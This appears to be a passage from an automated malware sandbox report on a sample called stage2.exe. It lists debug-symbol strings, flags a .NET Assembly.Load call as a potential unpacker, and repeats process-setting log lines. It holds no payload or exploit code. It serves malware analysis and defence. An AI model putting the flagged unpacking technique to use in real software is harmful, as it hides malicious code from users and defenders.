    Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
    Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

    Data Obfuscation:

    barindex
    .NET source code contains potential unpackerShow sources
    Source: stage2.exe, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.0.unpack, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.1.unpack, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.2.stage2.exe.ea0000.0.unpack, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.2.unpack, Facade.cs.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E77471 push C033084Eh; ret 2_2_07E77482
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E773CF push C033084Eh; ret 2_2_07E773E2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E7F1A0 push eax; ret 2_2_07E7F1B3
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07EA67E1 push es; ret 2_2_07EA67EC
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A327A0 push ebp; ret 13_2_07A327B4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A32780 push esp; ret 13_2_07A32794
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3273A push esp; ret 13_2_07A32794
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A667E1 push es; ret 13_2_07A667EC
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
